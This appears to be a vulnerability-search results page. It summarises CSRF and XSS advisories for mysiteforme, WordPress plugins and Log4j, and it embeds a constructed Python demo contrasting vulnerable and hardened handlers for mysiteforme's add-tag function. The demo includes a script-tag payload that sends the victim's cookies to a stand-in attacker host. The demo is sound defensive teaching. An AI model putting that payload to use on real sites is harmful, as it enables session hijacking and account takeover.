7705 matches found
CVE-2021-46027
mysiteforme, as of 19-12-2022, has a CSRF vulnerability in the background blog management. The attacker constructs a CSRF payload. Once the administrator clicks a malicious link, a blog tag will be added...
CVE-2021-46027
CVE-2021-46027 concerns a CSRF vulnerability in the background blog management of mysiteforme. The description across sources states an attacker can craft a malicious link and, when a site administrator clicks it, a blog tag is added, indicating a cross-site request forgery in the backend admini...
PT-2022-12512 · Unknown · Mysiteforme
Name of the vulnerable software and affected versions: mysiteforme (affected versions not specified). Description: The issue concerns a CSRF vulnerability in the background blog management of mysiteforme. An attacker can construct a malicious link that, when clicked by an administrator, results in t...
Mysiteforme cross-site request forgery vulnerability
Mysiteforme is a permission management system. A cross-site request forgery vulnerability exists in mysiteforme, which stems from missing CSRF validation in the backend blog administration. An attacker could use a forged malicious request to trick a victim into clickin...
Mysiteforme cross-site scripting vulnerability
Mysiteforme is a permission management system. mysiteforme suffers from a cross-site scripting vulnerability that stems from the lack of validation and filtering of user-supplied input and of output data in the blog tagging function of the backend blog management. An attacker could exploit the vulnerability...
Microservice Security: How to Proactively Protect Apps
Microservices are growing in popularity—how can development teams embed seamless security into the entire pipeline? Fernando Cardoso, solutions architect at Trend Micro, breaks it down for you...
PT-2022-12511 · Unknown · Mysiteforme
Name of the vulnerable software and affected versions: mysiteforme (affected versions not specified). Description: The issue concerns a Cross-Site Scripting (XSS) vulnerability via the add blog tag function in the background blog management. This allows for potential malicious script execution...
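The mysiteforme entries above (CVE-2021-46027 / PT-2022-12512 and PT-2022-12511) describe two defects in one "add blog tag" function: a state-changing request authenticated by the session cookie alone, and a tag value stored and rendered without escaping. The following is an added, constructed Python model of such an endpoint, written for this listing and not taken from mysiteforme's code base; the route, session layout, origin `https://admin.example.test` and attacker origin `https://attacker.test` are assumptions. It shows the forged request a victim's browser would emit, the vulnerable handler accepting it, and the hardened handler rejecting it with a session-bound synchronizer token plus an Origin check, and escapes the tag on output so a stored script tag is rendered inert.

```python
import html
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    # Minimal stand-in for an HTTP request (constructed, not a real framework).
    method: str
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


@dataclass
class App:
    # Assumed admin-panel origin; the hardened handler compares Origin against it.
    site_origin: str = "https://admin.example.test"
    sessions: dict = field(default_factory=dict)   # session id -> {"user", "csrf"}
    tags: list = field(default_factory=list)       # stored blog tags

    def login(self, user: str) -> str:
        sid = secrets.token_urlsafe(16)
        # One CSRF token per session: the attacker's page cannot read it cross-origin.
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
        return sid

    def _session(self, req: Request):
        return self.sessions.get(req.cookies.get("sid"))

    def add_tag_vulnerable(self, req: Request):
        # Vulnerable: a valid session cookie is the only requirement, so any page
        # that can make the victim's browser POST here succeeds.
        sess = self._session(req)
        if req.method != "POST" or sess is None:
            return 403, "forbidden"
        self.tags.append(req.form.get("name", ""))
        return 200, "added"

    def add_tag_hardened(self, req: Request):
        # Hardened: same session check, then reject cross-site Origin, then require
        # the synchronizer token that only same-origin pages can have read.
        sess = self._session(req)
        if req.method != "POST" or sess is None:
            return 403, "forbidden"
        origin = req.headers.get("Origin")
        if origin is not None and origin != self.site_origin:
            return 403, "cross-site origin"
        token = req.form.get("csrf_token", "")
        if not secrets.compare_digest(token.encode(), sess["csrf"].encode()):
            return 403, "missing or wrong csrf token"
        self.tags.append(req.form.get("name", ""))
        return 200, "added"

    def render_tags_unsafe(self) -> str:
        # Reflects stored tags verbatim: a stored <script> tag executes in the admin UI.
        return "".join(f"<li>{t}</li>" for t in self.tags)

    def render_tags(self) -> str:
        # Escaping at output is what neutralises the stored XSS.
        return "".join(f"<li>{html.escape(t)}</li>" for t in self.tags)


def forged_request(sid: str) -> Request:
    # What the admin's browser sends after opening an attacker page that hosts a
    # self-submitting <form method="POST"> aimed at the add-tag route. The browser
    # attaches the session cookie (no SameSite attribute, or SameSite=None), so the
    # server sees a logged-in admin; it also sets Origin to the attacker's site.
    payload = "<script>new Image().src='https://attacker.test/?c='+document.cookie</script>"
    return Request("POST", {"sid": sid}, {"name": payload},
                   {"Origin": "https://attacker.test"})


def legitimate_request(app: App, sid: str, name: str) -> Request:
    # A same-origin form submission carrying the session's token.
    token = app.sessions[sid]["csrf"]
    return Request("POST", {"sid": sid}, {"name": name, "csrf_token": token},
                   {"Origin": app.site_origin})


def demo() -> dict:
    app = App()
    sid = app.login("admin")
    forged = forged_request(sid)
    vuln_status, _ = app.add_tag_vulnerable(forged)   # 200: script tag stored
    hard_status, _ = app.add_tag_hardened(forged)     # 403: origin/token check fails
    ok_status, _ = app.add_tag_hardened(legitimate_request(app, sid, "security"))
    return {
        "vulnerable_accepts_forgery": vuln_status == 200,
        "hardened_rejects_forgery": hard_status == 403,
        "hardened_accepts_real_post": ok_status == 200,
        "tags": list(app.tags),
        "unsafe_html_has_script": "<script>" in app.render_tags_unsafe(),
        "escaped_html_has_script": "<script>" in app.render_tags(),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The Origin check alone is not sufficient (older clients and some proxies omit the header, which is why a missing Origin falls through to the token check rather than being accepted), and the token alone does not help if the same page reflects the tag unescaped; the two fixes address the two separately reported issues.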
blog.useberry.com Cross Site Scripting vulnerability OBB-2336986
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...
Security Bulletin: Apache Log4j vulnerability affects IBM Cloud Pak for Automation (CVE-2021-44228)
Summary: A remote code execution vulnerability has been reported for log4j-core-2.x libraries, which are used in various components of IBM Cloud Pak for Business Automation. Vulnerability Details: CVEID: CVE-2021-44228 DESCRIPTION: Apache Log4j could allow a remote attacker to execute arbitrary code...
Upcoming Speaking Engagements
This is a current list of where and when I am scheduled to speak: I’m giving an online-only talk on “Securing a World of Physically Capable Computers” as part of Teleport’s Security Visionaries 2022 series, on January 18, 2022. I’m speaking at IT-S Now 2022 in Vienna on June 2, 2022. I’m speaking...
blog.mercy.com Cross Site Scripting vulnerability OBB-2333444
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...
Halo cross-site scripting vulnerability
Halo is a personal blogging system for individual developers. Halo suffers from a cross-site scripting vulnerability, which stems from the lack of proper validation of client-side data in the web application, and can be exploited by an attacker to execute client-side code...
blog.barre3.com Cross Site Scripting vulnerability OBB-2331068
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...
Cross site request forgery (csrf)
The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a...
CVE-2021-25032
The PublishPress Capabilities WordPress plugin before 2.3.1, PublishPress Capabilities Pro WordPress plugin before 2.3.1 does not have authorisation and CSRF checks when updating the plugin’s settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a...
CVE-2021-25032
The CVE concerns the WordPress plugins PublishPress Capabilities and PublishPress Capabilities Pro (versions before 2.3.1). The issue stems from missing authorization and CSRF checks when updating plugin settings via the init hook, and failure to validate that updated options belong to the plugin...
Microsoft Sees Rampant Log4j Exploit Attempts, Testing
No surprise here: The holidays brought no Log4Shell relief. Threat actors vigorously launched exploit attempts and testing during the last weeks of December, Microsoft said on Monday, in the latest update to its landing page and guidance around the flaws in Apache’s Log4j logging library. “We have...
WordPress TrustMate.io – integracja z WooCommerce plugin <= 1.7.0 - Arbitrary Blog Option Update vulnerability
Arbitrary Blog Option Update vulnerability discovered by WPScanTeam in WordPress TrustMate.io – integracja z WooCommerce plugin versions <= 1.7.0. Solution: Update the WordPress TrustMate.io – integracja z WooCommerce plugin to the latest available version, at least 1.7.1...
Top 5 DevOps Resource Center Articles of 2021
We look back on the 5 most popular DevOps Resource Center articles in 2021 to help you build at your best in 2022...
Mitigating Log4Shell and Other Log4j-Related Vulnerabilities
Summary: The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), the Computer Emergency Response Team New Zealand (CERT NZ), the New Zealand...